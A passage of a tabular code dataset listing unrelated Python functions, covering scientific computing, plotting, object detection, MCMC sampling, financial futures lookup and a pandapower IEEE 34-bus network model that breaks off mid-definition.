content stringlengths 22 815k | id int64 0 4.91M |
|---|---|
def household_id_list(filelist, pidp):
""" For a set of waves, obtain a list of household IDs belonging to the same individual. """
hidp_list = []
wave_list = []
wn = {1:'a', 2:'b', 3:'c', 4:'d', 5:'e', 6:'f', 7:'g'}
c=1
for name in filelist:
print("Loading wave %d data..." % c)
df = pd.read_csv(name, sep='\t')
if pidp in df['pidp'].values:
kword = wn[c]+'_hidp'
hidp = df.loc[df['pidp'] == pidp, kword].values
hidp_list.append(hidp)
wave_list.append(c)
c+=1
print("\nIndividual %d present in waves {}".format(wave_list) % pidp)
return hidp_list | 5,333,500 |
def biggest_labelizer_arbitrary(metrics: dict, choice: str, *args, **kwargs) -> Tuple[str, float]:
"""Given dict of metrics result, returns (key, metrics[key]) whose value is maximal."""
metric_values = list(metrics.values())
metric_keys = list(metrics.keys())
# print(items)
big = metric_values[0]
draws = [0]
for idx, val in enumerate(metric_values[1:], start=1):
if val > big:
big = val
draws = [idx]
elif val == big:
draws.append(idx)
if len(draws) > 1 and choice in (metric_keys[idx] for idx in draws):
return choice, big
return metric_keys[draws[0]], big | 5,333,501 |
def _seaborn_viz_histogram(data, x: str, contrast: Optional[str] = None, **kwargs):
"""Plot a single histogram.
Args:
data (DataFrame): The data
x (str): The name of the column to plot.
contrast (str, optional): The name of the categorical column to use for multiple contrasts.
**kwargs: Keyword arguments passed to seaborn.distplot
Raises:
ValueError: Not a numeric column.
Returns:
Seaborn Axis Object
"""
if x not in data.select_dtypes("number").columns:
raise ValueError("x must be numeric column")
default_hist_kwargs: Dict[str, Any] = {}
hist_kwargs = {**default_hist_kwargs, **(kwargs or {})}
if contrast:
data[contrast] = data[contrast].astype("category")
ax = sns.histplot(x=x, hue=contrast, data=data, **hist_kwargs)
else:
ax = sns.histplot(data[x], **hist_kwargs)
ax.set_title(f"Histogram of {x}")
return ax | 5,333,502 |
def test_connect_args():
"""
Tests connect string
"""
engine = conftest.get_engine()
try:
results = engine.execute('select version from sys.version').fetchone()
assert results is not None
finally:
engine.dispose() | 5,333,503 |
def str2bool( s ):
"""
Description:
----------
Converting an input string to a boolean
Arguments:
----------
[NAME] [TYPE] [DESCRIPTION]
(1) s dict, str The string which
Returns:
----------
True/False depending on the given input strin gv
"""
if isinstance( s, dict ):
for key, _ in s.items():
s[ key ] = str2bool( s[ key ] )
else:
return v.lower() in ( "yes", "true", "t", "1" ) | 5,333,504 |
def im_detect(net, im, boxes=None):
"""Detect object classes in an image given object proposals.
Arguments:
net (caffe.Net): Fast R-CNN network to use
im (ndarray): color image to test (in BGR order)
boxes (ndarray): R x 4 array of object proposals or None (for RPN)
Returns:
scores (ndarray): R x K array of object class scores (K includes
background as object category 0)
boxes (ndarray): R x (4*K) array of predicted bounding boxes
"""
blobs, im_scales = _get_blobs(im, boxes)
# When mapping from image ROIs to feature map ROIs, there's some aliasing
# (some distinct image ROIs get mapped to the same feature ROI).
# Here, we identify duplicate feature ROIs, so we only compute features
# on the unique subset.
# if cfg.DEDUP_BOXES > 0 and not cfg.TEST.HAS_RPN:
# v = np.array([1, 1e3, 1e6, 1e9, 1e12])
# hashes = np.round(blobs['rois'] * cfg.DEDUP_BOXES).dot(v)
# _, index, inv_index = np.unique(hashes, return_index=True,
# return_inverse=True)
# blobs['rois'] = blobs['rois'][index, :]
# boxes = boxes[index, :]
if cfg.TEST.HAS_RPN:
im_blob = blobs['data']
blobs['im_info'] = np.array(
[[im_blob.shape[2], im_blob.shape[3], im_scales[0]]],
dtype=np.float32)
# reshape network inputs
net.blobs['data'].reshape(*(blobs['data'].shape))
if cfg.TEST.HAS_RPN:
net.blobs['im_info'].reshape(*(blobs['im_info'].shape))
else:
net.blobs['rois'].reshape(*(blobs['rois'].shape))
# do forward
forward_kwargs = {'data': blobs['data'].astype(np.float32, copy=False)}
if cfg.TEST.HAS_RPN:
forward_kwargs['im_info'] = blobs['im_info'].astype(np.float32, copy=False)
else:
forward_kwargs['rois'] = blobs['rois'].astype(np.float32, copy=False)
blobs_out = net.forward(**forward_kwargs)
if cfg.TEST.HAS_RPN:
assert len(im_scales) == 1, "Only single-image batch implemented"
rois = net.blobs['rois'].data.copy()
# unscale back to raw image space
boxes = rois[:, 1:5] / im_scales[0]
if cfg.TEST.SVM:
# use the raw scores before softmax under the assumption they
# were trained as linear SVMs
scores = net.blobs['cls_score'].data
else:
# use softmax estimated probabilities
scores = blobs_out['cls_prob']
# if cfg.TEST.BBOX_REG:
if False:
# Apply bounding-box regression deltas
box_deltas = blobs_out['bbox_pred']
pred_boxes = bbox_transform_inv(boxes, box_deltas)
pred_boxes = clip_boxes(pred_boxes, im.shape)
else:
# Simply repeat the boxes, once for each class
pred_boxes = np.tile(boxes, (1, scores.shape[1]))
# if cfg.DEDUP_BOXES > 0 and not cfg.TEST.HAS_RPN:
# # Map scores and predictions back to the original set of boxes
# scores = scores[inv_index, :]
# pred_boxes = pred_boxes[inv_index, :]
fc7 = net.blobs['fc7'].data
return net.blobs['cls_score'].data[:, :], scores, fc7, pred_boxes | 5,333,505 |
def preCSVdatagen(xy_p, radius, nbin, PlainFirst):
"""Format the data before generating the csv input for ili'.
Args:
xy_p (str): path to the X and Y coordiantes of ablation marks .npy file.
radius (int): displayed radius of the marks in ili'.
nbin (int): bin factor used to bin the image for ili'.
PlainFirst (bool): intensity values of each datapoints are equal to 1. Used to visualize the ablation mark
coordinates on the postMALDI brighfield in ili'.
Returns:
data (list): formatted data (2D).
"""
X, Y = np.load(xy_p)
Xs = X /( nbin) # todo check relevance of Y <-> X
Ys = Y /( nbin)
Ys = Ys - np.min(Ys)
Xs = Xs - np.min(Xs)
Rs = np.ones(np.shape(Xs)) * radius
data = []
data.append(list(np.append('Num', list(range(np.shape(Xs.ravel())[0])))))
data.append(list(np.append('X', Ys.ravel())))
data.append(list(np.append('Y', Xs.ravel())))
data.append(list(np.append('Z', np.zeros(np.shape(Xs.ravel())))))
data.append(list(np.append('R', Rs.ravel())))
if PlainFirst:
data.append(list(np.append('Flat', np.ones(np.shape(Xs.ravel())))))
return data | 5,333,506 |
def dispatch_error_adaptor(func):
"""Construct a signature isomorphic to dispatch_error.
The actual handler will receive only arguments explicitly
declared, and a possible tg_format parameter.
"""
def adaptor(controller, tg_source,
tg_errors, tg_exceptions, *args, **kw):
tg_format = kw.pop('tg_format', None)
args, kw = inject_args(func, {"tg_source": tg_source,
"tg_errors": tg_errors, "tg_exceptions": tg_exceptions},
args, kw, 1)
args, kw = adapt_call(func, args, kw, 1)
if tg_format is not None:
kw['tg_format'] = tg_format
return func(controller, *args, **kw)
return adaptor | 5,333,507 |
def address_split(address, env=None):
"""The address_split() function splits an address into its four
components. Address strings are on the form
detector-detectorID|device-deviceID, where the detectors must be in
dir(xtc.DetInfo.Detector) and device must be in
(xtc.DetInfo.Device).
@param address Full data source address of the DAQ device
@param env Optional env to dereference an alias into an address
@return Four-tuple of detector name, detector ID, device, and
device ID
"""
import re
# pyana
m = re.match(
r"^(?P<det>\S+)\-(?P<det_id>\d+)\|(?P<dev>\S+)\-(?P<dev_id>\d+)$", address)
if m is not None:
return (m.group('det'), m.group('det_id'), m.group('dev'), m.group('dev_id'))
# psana
m = re.match(
r"^(?P<det>\S+)\.(?P<det_id>\d+)\:(?P<dev>\S+)\.(?P<dev_id>\d+)$", address)
if m is not None:
return (m.group('det'), m.group('det_id'), m.group('dev'), m.group('dev_id'))
# psana DetInfo string
m = re.match(
r"^DetInfo\((?P<det>\S+)\.(?P<det_id>\d+)\:(?P<dev>\S+)\.(?P<dev_id>\d+)\)$", address)
if m is not None:
return (m.group('det'), m.group('det_id'), m.group('dev'), m.group('dev_id'))
if env is not None:
# Try to see if this is a detector alias, and if so, dereference it. Code from psana's Detector/PyDetector.py
amap = env.aliasMap()
alias_src = amap.src(address) # string --> DAQ-style psana.Src
# if it is an alias, look up the full name
if amap.alias(alias_src) != '': # alias found
address = str(alias_src)
return address_split(address)
return (None, None, None, None) | 5,333,508 |
def solveGroth(A, n, init_val=None):
"""
...
Parameters
----------
A: np.matrix
dfajdslkf
n: int
ddddddd
init_val: float, optional
dsfdsafdasfd
Returns
-------
list of
float:
float:
float:
float:
"""
eps=0.5
eta=0.05
threshold = 1.1
N = n
Ap = A
if init_val is not None:
w=init_val
else:
w = np.ones(N)
min_val = np.sum(np.abs(Ap))
curr_y = np.zeros(N)
curr_alpha = np.zeros(N)
avg_y_val = np.zeros(N)
avg_X=np.zeros((N,N))
avg_alpha=np.zeros(N)
T=4*N
schedule_size = round(T/8) #We change eps in epochs
print("iteration bound:",T)
z = np.zeros(N)
vals = 0
g = np.random.standard_normal(T)
for i in range(T):
if (i+1)%(T/2)==0:
eps=0.01
if i%schedule_size ==0 and eps>0.01 :
eps=eps/2
if i%schedule_size == 0 and i>T/2:
eps /= 2
wtil=(1-eta)*w+eta*np.ones(N)
w1 = np.array([1/np.sqrt(j) for j in wtil])
start_time = time.time()
d = np.tile(w1, (N, 1))
M = np.multiply(Ap,d)
d = np.tile(np.array([w1]).transpose(), (1,N))
M = np.multiply(M,d)
start_time = time.time()
eigval, eigvec = lasp.eigsh(M, k=1, which='LA', tol=0.00001)
y = eigvec[:,0]
y *= np.sqrt(N)
y = np.multiply(y,w1)
avg_y_val += y**2
val = np.matmul(np.transpose(y), np.matmul(Ap,y))
avg_alpha+=val*w
if val < min_val:
min_val = val
curr_y = y
curr_alpha = w
vals += val
print("iterate", i, "val = ", val, " minval=", min_val, " linf of curr y=", np.max(np.abs(y**2)) , " infinity norm avg X =", np.max((1.0/(i+1))*avg_y_val), "SDP sol val:", vals/(i+1), "eps,eta=", eps, " , ", eta)
if checkCondition(y,threshold):
print(y,"Current iterate Condition satisfied, i : ",i)
print("min val = ", min_val)
print("curr_y = ", curr_y)
print("curr_alpha = ", curr_alpha)
print("inf norm of curr_y=", max(abs(curr_y)))
return [np.matmul(curr_y,curr_y.T),min_val, curr_alpha, avg_y_val]
elif checkCondition((1.0/(i+1))*avg_y_val, threshold):
avg_y_val=(1.0/(i+1))*avg_y_val
avg_val = vals/(i+1)
print(avg_y_val," Avg Condition satisfied, i : ",i)
print("min val = ", min_val)
print("curr val=", avg_val)
print("curr_alpha = ", (1.0/i)*avg_alpha)
print("inf norm of avg_y=", max(abs(avg_y_val)))
return [(1.0/(i+1))*avg_X,min_val, curr_alpha, avg_y_val]
if i < T/2:
w = updateWeights_2(w,y,threshold, eps, N)
else:
w = updateWeights(w,y,threshold, 2*eps, N)
u = y*g[i]
z += u
print("min val = ", min_val)
print("sum of curr_alpha = ", sum(curr_alpha))
print("sum weights at end = ", sum(w))
print("inf norm of curr_y=", max(abs(curr_y)))
return [np.matmul(curr_y, curr_y.T), min_val, curr_alpha, avg_y_val] | 5,333,509 |
def verify_any(func, *args, **kwargs):
"""
Assert that any of `func(*args, **kwargs)` are true.
"""
return _verify(func, 'any', *args, **kwargs) | 5,333,510 |
def can_create_election(user_id, user_info):
""" for now, just let it be"""
return True | 5,333,511 |
def get_system_language():
""" Get system language and locale """
try:
default_locale = locale.getdefaultlocale()
except ValueError:
if IS_MAC:
# Fix for "ValueError: unknown locale: UTF-8" on Mac.
# The default English locale on Mac is set as "UTF-8" instead of "en-US.UTF-8"
# see https://bugs.python.org/issue18378
return 'en_US', 'UTF-8'
# re-throw any other issue
raise
system_lang = default_locale[0]
system_locale = default_locale[1]
return system_lang, system_locale | 5,333,512 |
def circle_pattern(pattern_radius,
circle_radius,
count,
center=[0.0, 0.0],
angle=None,
**kwargs):
"""
Create a Path2D representing a circle pattern.
Parameters
------------
pattern_radius : float
Radius of circle centers
circle_radius : float
The radius of each circle
count : int
Number of circles in the pattern
center : (2,) float
Center of pattern
angle : float
If defined pattern will span this angle
If None, pattern will be evenly spaced
Returns
-------------
pattern : trimesh.path.Path2D
Path containing circular pattern
"""
from .path import Path2D
if angle is None:
angles = np.linspace(0.0, np.pi * 2.0, count + 1)[:-1]
elif isinstance(angle, float) or isinstance(angle, int):
angles = np.linspace(0.0, angle, count)
else:
raise ValueError('angle must be float or int!')
# centers of circles
centers = np.column_stack((
np.cos(angles), np.sin(angles))) * pattern_radius
vert = []
ents = []
for circle_center in centers:
# (3,3) center points of arc
three = arc.to_threepoint(angles=[0, np.pi],
center=circle_center,
radius=circle_radius)
# add a single circle entity
ents.append(
Arc(
points=np.arange(3) + len(vert),
closed=True))
# keep flat array by extend instead of append
vert.extend(three)
# translate vertices to pattern center
vert = np.array(vert) + center
pattern = Path2D(entities=ents,
vertices=vert,
**kwargs)
return pattern | 5,333,513 |
def boolean(input):
"""Convert the given input to a boolean value.
Intelligently handles boolean and non-string values, returning
as-is and passing to the bool builtin respectively.
This process is case-insensitive.
Acceptable values:
True
* yes
* y
* on
* true
* t
* 1
False
* no
* n
* off
* false
* f
* 0
:param input: the value to convert to a boolean
:type input: any
:returns: converted boolean value
:rtype: bool
"""
try:
input = input.strip().lower()
except AttributeError:
return bool(input)
if input in ('yes', 'y', 'on', 'true', 't', '1'):
return True
if input in ('no', 'n', 'off', 'false', 'f', '0'):
return False
raise ValueError("Unable to convert {0!r} to a boolean value.".format(input)) | 5,333,514 |
def check_analyzed_packages_count(context, num=1):
"""Check number of analyzed packages."""
context_reponse_existence_check(context)
json_data = context.response.json()
check_attribute_presence(json_data, "result")
result = json_data["result"]
check_attribute_presence(result, "data")
data = result["data"]
assert len(data) == num, "{} packages expected, but found {} instead".format(num, len(data)) | 5,333,515 |
def generate_edges(graph, bucketing='epsilon', eps=1e-2, k=3):
"""Generate the set of edges
"""
u, v, w = find(graph)
if bucketing == 'epsilon':
w_prime = np.array(w/eps, dtype=np.int32)
elif bucketing == 'kmeans':
clf = KMeans(n_clusters=k)
clf.fit(w.reshape((-1, 1)))
centers, labels = clf.cluster_centers_, clf.labels_
w_prime = centers[labels]
list_edges = list(zip(u, v, w, w_prime))
list_edges.sort(key=lambda x: -x[2])
cur_weight = list_edges[0][3]
edges_bucket = []
for e in list_edges:
if np.abs(e[3] - cur_weight) < 1e-7:
edges_bucket.append(e)
else:
yield edges_bucket
edges_bucket = []
cur_weight = e[3]
yield edges_bucket | 5,333,516 |
def find_horizontal_up_down_links(tc, u, out_up=None, out_down=None):
"""Find indices of nodes that locate
at horizontally upcurrent and downcurrent directions
"""
if out_up is None:
out_up = np.zeros(u.shape[0], dtype=np.int)
if out_down is None:
out_down = np.zeros(u.shape[0], dtype=np.int)
out_up[:] = tc.link_west[:]
out_down[:] = tc.link_east[:]
negative_u_index = np.where(u < 0)[0]
out_up[negative_u_index] = tc.link_east[negative_u_index]
out_down[negative_u_index] = tc.link_west[negative_u_index]
return out_up, out_down | 5,333,517 |
def PyParser_SimpleParseStringFlagsFilename(space, str, filename, start, flags):
"""Parse Python source code from str using the start token start according to
the flags argument. The result can be used to create a code object which can
be evaluated efficiently. This is useful if a code fragment must be evaluated
many times. filename is decoded from the filesystem encoding
(sys.getfilesystemencoding())."""
raise NotImplementedError | 5,333,518 |
def write_file(filename, content):
"""Write content to a file and set the correct file permission """
with open(os.open(filename,
os.O_CREAT | os.O_WRONLY, 0o600), 'w') as file:
yaml.safe_dump(content, file, default_flow_style=False, sort_keys=False) | 5,333,519 |
def _compute_composite_beta(model, robo, j, i):
"""
Compute the composite beta wrench for link i.
Args:
model: An instance of DynModel
robo: An instance of Robot
j: link number
i: antecedent value
Returns:
An instance of DynModel that contains all the new values.
"""
i_beta_i_c = Screw()
# local variables
j_s_i = robo.geos[j].tmat.s_i_wrt_j
i_beta_i = model.composite_betas[i].val
j_beta_j_c = model.composite_betas[j].val
j_inertia_j_c = model.composite_inertias[j].val
j_zeta_j = model.zetas[j].val
# actual computation
i_beta_i_c.val = i_beta_i + (j_s_i.transpose() * j_beta_j_c) - \
(j_s_i.transpose() * j_inertia_j_c * j_zeta_j)
# store computed beta in model
model.composite_betas[i] = i_beta_i_c
return model | 5,333,520 |
def check_system_type(product_dict):
""" This function checks for errors in the system name input
Parameters - YAML for product information .dict
----------
Returns - checked product_dict
-------
"""
#System system assertions
System_Type = product_dict.get('System_Type','')
assert System_Type, 'Input file requires system type'
System_Type = product_dict.get('System_Type')
assert type(System_Type) == int, 'Input file requires integer input'
assert 1 <= System_Type <= 30, 'System type input not within range of index' | 5,333,521 |
def pos(x, y):
"""Returns floored and camera-offset x,y tuple.
Setting out of bounds is possible, but getting is not; mod in callers for get_at.
"""
return (flr(xo + x), flr(yo + y)) | 5,333,522 |
def test_create_vm_on_available_memory_node(request, admin_session, image,
keypair, harvester_api_endpoints):
"""
Create VM with resource with one node in cluster memory
Covers:
virtual-machines-72-vm with resource with one node in cluster memory
"""
# find out the node that has the most available memory
(nodes, available_memory) = utils.lookup_hosts_with_most_available_memory(
admin_session, harvester_api_endpoints)
# now create a VM using the most available memory to ensure it will only be
# scheduled on the host that has that resource
assert available_memory > 0, 'No nodes has enough memory to create VMs'
vm_json = None
try:
vm_json = utils.create_vm(request, admin_session, image,
harvester_api_endpoints, keypair=keypair,
memory_gb=available_memory)
vm_instance_json = utils.lookup_vm_instance(
admin_session, harvester_api_endpoints, vm_json)
vm_node = vm_instance_json['status']['nodeName']
assert vm_node in nodes, (
'Expect VM to be running on node %s, but it is running on node '
'%s' % (nodes, vm_node))
finally:
if vm_json:
utils.delete_vm(request, admin_session, harvester_api_endpoints,
vm_json) | 5,333,523 |
def _check_blockstream_for_transactions(
accounts: List[BTCAddress],
) -> Dict[BTCAddress, Tuple[bool, FVal]]:
"""May raise connection errors or KeyError"""
have_transactions = {}
for account in accounts:
url = f'https://blockstream.info/api/address/{account}'
response_data = request_get_dict(url=url, handle_429=True, backoff_in_seconds=4)
stats = response_data['chain_stats']
balance = satoshis_to_btc(int(stats['funded_txo_sum']) - int(stats['spent_txo_sum']))
have_txs = stats['tx_count'] != 0
have_transactions[account] = (have_txs, balance)
return have_transactions | 5,333,524 |
def metropolis_hastings(
proposal: Proposal,
state: State,
step_size: float,
ns: int,
unif: float,
inverse_transform: Callable
) -> Tuple[State, Info, np.ndarray, bool]:
"""Computes the Metropolis-Hastings accept-reject criterion given a proposal, a
current state of the chain, a integration step-size, and a number of
itnegration steps. We also provide a uniform random variable for
determining the accept-reject criterion and the inverse transformation
function for transforming parameters from an unconstrained space to a
constrained space.
Args:
proposal: A proposal operator to advance the state of the Markov chain.
state: An augmented state object with the updated position and momentum
and values for the log-posterior and metric and their gradients.
step_size: The integration step-size.
num_steps: The number of integration steps.
unif: Uniform random number for determining the accept-reject decision.
inverse_transform: Inverse transformation to map samples back to the
original space.
Returns:
state: An augmented state object with the updated position and momentum
and values for the log-posterior and metric and their gradients.
info: An information object with the updated number of fixed point
iterations and boolean indicator for successful integration.
q: The position variable in the constrained space.
accept: Whether or not the proposal was accepted.
"""
ham = hamiltonian(
state.momentum,
state.log_posterior,
state.logdet_metric,
state.inv_metric)
q, fldj = inverse_transform(state.position)
ildj = -fldj
new_state, prop_info = proposal.propose(state, step_size, ns)
new_chol, new_logdet = new_state.sqrtm_metric, new_state.logdet_metric
new_q, new_fldj = inverse_transform(new_state.position)
new_ham = hamiltonian(
new_state.momentum,
new_state.log_posterior,
new_state.logdet_metric,
new_state.inv_metric)
# Notice the relevant choice of sign when the Jacobian determinant of the
# forward or inverse transform is used.
#
# Write this expression as,
# (exp(-new_ham) / exp(new_fldj)) / (exp(-ham) * exp(ildj))
#
# See the following resource for understanding the Metropolis-Hastings
# correction with a Jacobian determinant correction [1].
#
# [1] https://wiki.helsinki.fi/download/attachments/48865399/ch7-rev.pdf
logu = np.log(unif)
metropolis = logu < ham - new_ham - new_fldj - ildj + prop_info.logdet
accept = np.logical_and(metropolis, prop_info.success)
if accept:
state = new_state
q = new_q
ildj = -new_fldj
state.momentum *= -1.0
return state, prop_info, q, accept | 5,333,525 |
def continuous_future(root_symbol_str, offset=0, roll="volume", adjustment="mul", bundle=None):
"""
Return a ContinuousFuture object for the specified root symbol in the specified bundle
(or default bundle).
Parameters
----------
root_symbol_str : str
The root symbol for the future chain.
offset : int, optional
The distance from the primary contract. Default is 0.
roll : str, optional
How rolls are determined. Possible choices: 'volume',
(roll when back contract volume exceeds front contract
volume), or 'calendar' (roll on rollover date). Default
is 'volume'.
adjustment : str, optional
Method for adjusting lookback prices between rolls. Options are
'mul', 'add' or None. 'mul' calculates the ratio of front and back
contracts on the roll date ((back - front)/front) and multiplies
front contract prices by (1 + ratio). 'add' calculates the difference
between back and front contracts on the roll date (back - front)
and adds the difference to front contract prices. None concatenates
contracts without any adjustment. Default is 'mul'.
bundle : str, optional
the bundle code. If omitted, the default bundle will be used (and must be set).
Returns
-------
asset : zipline.assets.ContinuousFuture
Examples
--------
Get the continuous future object for ES and get the current chain as of
2020-09-18:
>>> es = continuous_future("ES", roll="volume", bundle="es-1min") # doctest: +SKIP
>>> data = get_data("2020-09-18 10:00:00", bundle="es-1min") # doctest: +SKIP
>>> print(data.current_chain(es)) # doctest: +SKIP
"""
if not bundle:
bundle = get_default_bundle()
if not bundle:
raise ValidationError("you must specify a bundle or set a default bundle")
bundle = bundle["default_bundle"]
load_extensions(code=bundle)
bundle_data = bundles.load(
bundle,
os.environ,
pd.Timestamp.utcnow(),
)
asset_finder = asset_finder_cache.get(bundle, bundle_data.asset_finder)
asset_finder_cache[bundle] = asset_finder
continuous_future = asset_finder.create_continuous_future(
root_symbol_str,
offset,
roll,
adjustment,
)
return continuous_future | 5,333,526 |
def Now():
"""Returns a datetime.datetime instance representing the current time.
This is just a wrapper to ease testing against the datetime module.
Returns:
An instance of datetime.datetime.
"""
return datetime.datetime.now() | 5,333,527 |
def test_basic_auth_with_session(basic_auth_client):
"""
"""
res = None
with basic_auth_client._session() as s:
res = s.basic_auth('user', 'password')
assert res['authenticated'] is True | 5,333,528 |
def ndvi_list_hdf(hdf_dir, satellite=None):
"""
List all the available HDF files, grouped by tile
Args:
hdf_dir: directory containing one subdirectory per year which contains
HDF files
satellite: None to select both Tera and Aqua, 'mod13q1' for MODIS,
'myd13q1' for Aqua
Returns:
list: A dict (keyed by tilename) of list of (full filepath,
timestamp_ms) tuples, sorted by timestamp_ms
"""
files = collections.defaultdict(lambda: [])
for subdir in os.listdir(hdf_dir):
subdir = os.path.join(hdf_dir, subdir)
if not os.path.isdir(subdir):
continue
for hdf_file in os.listdir(subdir):
if not hdf_file.endswith('.hdf'):
continue
try:
full_fname = os.path.join(subdir, hdf_file)
d = parse_ndvi_filename(hdf_file)
if satellite is not None and satellite != d['satellite']:
continue
files[d['tile_name']].append((full_fname, d['timestamp_ms']))
except ValueError as e:
print e
for tile_name in files.keys():
files[tile_name] = sorted(files[tile_name], key=lambda t: t[1])
return files | 5,333,529 |
def read_levels(dir_path: str,
progress_monitor: PyramidLevelCallback = None) -> List[xr.Dataset]:
"""
Read the of a multi-level pyramid with spatial resolution
decreasing by a factor of two in both spatial dimensions.
:param dir_path: The directory path.
:param progress_monitor: An optional progress monitor.
:return: A list of dataset instances representing the multi-level pyramid.
"""
file_paths = os.listdir(dir_path)
level_paths = {}
num_levels = -1
for filename in file_paths:
file_path = os.path.join(dir_path, filename)
basename, ext = os.path.splitext(filename)
if basename.isdigit():
index = int(basename)
num_levels = max(num_levels, index + 1)
if os.path.isfile(file_path) and ext == ".link":
level_paths[index] = (ext, file_path)
elif os.path.isdir(file_path) and ext == ".zarr":
level_paths[index] = (ext, file_path)
if num_levels != len(level_paths):
raise ValueError(f"Inconsistent pyramid directory:"
f" expected {num_levels} but found {len(level_paths)} entries:"
f" {dir_path}")
levels = []
for index in range(num_levels):
ext, file_path = level_paths[index]
if ext == ".link":
with open(file_path, "r") as fp:
link_file_path = fp.read()
dataset = xr.open_zarr(link_file_path)
else:
dataset = xr.open_zarr(file_path)
if progress_monitor is not None:
progress_monitor(dataset, index, num_levels)
levels.append(dataset)
return levels | 5,333,530 |
def register_type_representer(t, func):
"""
Register a function that will act as a type representer for the specified type.
Parameters:
t: the type
func: the function that will be used to produce a representation for values of type t
"""
typerepresenters[t] = func | 5,333,531 |
def test_cback():
"""
Test the C backend.
"""
assert all(
map(
lambda x: x is not None,
ising.__main__.main(pass_args=__ARGS + ["--backend", "c"], test=True),
)
) | 5,333,532 |
def create_provisioned_product_name(account_name: str) -> str:
"""
Replaces all space characters in an Account Name with hyphens,
also removes all trailing and leading whitespace
"""
return account_name.strip().replace(" ", "-") | 5,333,533 |
def case34():
"""
Create the IEEE 34 bus from IEEE PES Test Feeders:
"https://site.ieee.org/pes-testfeeders/resources/”.
OUTPUT:
**net** - The pandapower format network.
"""
net = pp.create_empty_network()
# Linedata
# CF-300
line_data = {'c_nf_per_km': 3.8250977, 'r_ohm_per_km': 0.69599766,
'x_ohm_per_km': 0.5177677,
'c0_nf_per_km': 1.86976748, 'r0_ohm_per_km': 1.08727498,
'x0_ohm_per_km': 1.47374703,
'max_i_ka': 0.23, 'type': 'ol'}
pp.create_std_type(net, line_data, name='CF-300', element='line')
# CF-301
line_data = {'c_nf_per_km': 3.66884364, 'r_ohm_per_km': 1.05015841,
'x_ohm_per_km': 0.52265586,
'c0_nf_per_km': 1.82231544, 'r0_ohm_per_km': 1.48350255,
'x0_ohm_per_km': 1.60203942,
'max_i_ka': 0.18, 'type': 'ol'}
pp.create_std_type(net, line_data, name='CF-301', element='line')
# CF-302
line_data = {'c_nf_per_km': 0.8751182, 'r_ohm_per_km': 0.5798427,
'x_ohm_per_km': 0.30768221,
'c0_nf_per_km': 0.8751182, 'r0_ohm_per_km': 0.5798427,
'x0_ohm_per_km': 0.30768221,
'max_i_ka': 0.14, 'type': 'ol'}
pp.create_std_type(net, line_data, name='CF-302', element='line')
# CF-303
line_data = {'c_nf_per_km': 0.8751182, 'r_ohm_per_km': 0.5798427,
'x_ohm_per_km': 0.30768221,
'c0_nf_per_km': 0.8751182, 'r0_ohm_per_km': 0.5798427,
'x0_ohm_per_km': 0.30768221,
'max_i_ka': 0.14, 'type': 'ol'}
pp.create_std_type(net, line_data, name='CF-303', element='line')
# CF-304
line_data = {'c_nf_per_km': 0.90382554, 'r_ohm_per_km': 0.39802955,
'x_ohm_per_km': 0.29436416,
'c0_nf_per_km': 0.90382554, 'r0_ohm_per_km': 0.39802955,
'x0_ohm_per_km': 0.29436416,
'max_i_ka': 0.18, 'type': 'ol'}
pp.create_std_type(net, line_data, name='CF-304', element='line')
# Busses
# bus0 = pp.create_bus(net, name='Bus 0', vn_kv=69.0, type='n', zone='34_BUS')
bus_800 = pp.create_bus(net, name='Bus 800', vn_kv=24.9, type='n', zone='34_BUS')
bus_802 = pp.create_bus(net, name='Bus 802', vn_kv=24.9, type='n', zone='34_BUS')
bus_806 = pp.create_bus(net, name='Bus 806', vn_kv=24.9, type='n', zone='34_BUS')
bus_808 = pp.create_bus(net, name='Bus 808', vn_kv=24.9, type='n', zone='34_BUS')
bus_810 = pp.create_bus(net, name='Bus 810', vn_kv=24.9, type='n', zone='34_BUS')
bus_812 = pp.create_bus(net, name='Bus 812', vn_kv=24.9, type='n', zone='34_BUS')
bus_814 = pp.create_bus(net, name='Bus 814', vn_kv=24.9, type='n', zone='34_BUS')
bus_850 = pp.create_bus(net, name='Bus 850', vn_kv=24.9, type='n', zone='34_BUS')
bus_816 = pp.create_bus(net, name='Bus 816', vn_kv=24.9, type='n', zone='34_BUS')
bus_818 = pp.create_bus(net, name='Bus 818', vn_kv=24.9, type='n', zone='34_BUS')
bus_820 = pp.create_bus(net, name='Bus 820', vn_kv=24.9, type='n', zone='34_BUS')
bus_822 = pp.create_bus(net, name='Bus 822', vn_kv=24.9, type='n', zone='34_BUS')
bus_824 = pp.create_bus(net, name='Bus 824', vn_kv=24.9, type='n', zone='34_BUS')
bus_826 = pp.create_bus(net, name='Bus 826', vn_kv=24.9, type='n', zone='34_BUS')
bus_828 = pp.create_bus(net, name='Bus 828', vn_kv=24.9, type='n', zone='34_BUS')
bus_830 = pp.create_bus(net, name='Bus 830', vn_kv=24.9, type='n', zone='34_BUS')
bus_854 = pp.create_bus(net, name='Bus 854', vn_kv=24.9, type='n', zone='34_BUS')
bus_852 = pp.create_bus(net, name='Bus 852', vn_kv=24.9, type='n', zone='34_BUS')
bus_832 = pp.create_bus(net, name='Bus 832', vn_kv=24.9, type='n', zone='34_BUS')
bus_858 = pp.create_bus(net, name='Bus 858', vn_kv=24.9, type='n', zone='34_BUS')
bus_834 = pp.create_bus(net, name='Bus 834', vn_kv=24.9, type='n', zone='34_BUS')
bus_842 = pp.create_bus(net, name='Bus 842', vn_kv=24.9, type='n', zone='34_BUS')
bus_844 = pp.create_bus(net, name='Bus 844', vn_kv=24.9, type='n', zone='34_BUS')
bus_846 = pp.create_bus(net, name='Bus 846', vn_kv=24.9, type='n', zone='34_BUS')
bus_848 = pp.create_bus(net, name='Bus 848', vn_kv=24.9, type='n', zone='34_BUS')
bus_860 = pp.create_bus(net, name='Bus 860', vn_kv=24.9, type='n', zone='34_BUS')
bus_836 = pp.create_bus(net, name='Bus 836', vn_kv=24.9, type='n', zone='34_BUS')
bus_840 = pp.create_bus(net, name='Bus 840', vn_kv=24.9, type='n', zone='34_BUS')
bus_862 = pp.create_bus(net, name='Bus 862', vn_kv=24.9, type='n', zone='34_BUS')
bus_838 = pp.create_bus(net, name='Bus 838', vn_kv=24.9, type='n', zone='34_BUS')
bus_864 = pp.create_bus(net, name='Bus 864', vn_kv=24.9, type='n', zone='34_BUS')
bus_888 = pp.create_bus(net, name='Bus 888', vn_kv=4.16, type='n', zone='34_BUS')
bus_890 = pp.create_bus(net, name='Bus 890', vn_kv=4.16, type='n', zone='34_BUS')
bus_856 = pp.create_bus(net, name='Bus 856', vn_kv=24.9, type='n', zone='34_BUS')
# Lines
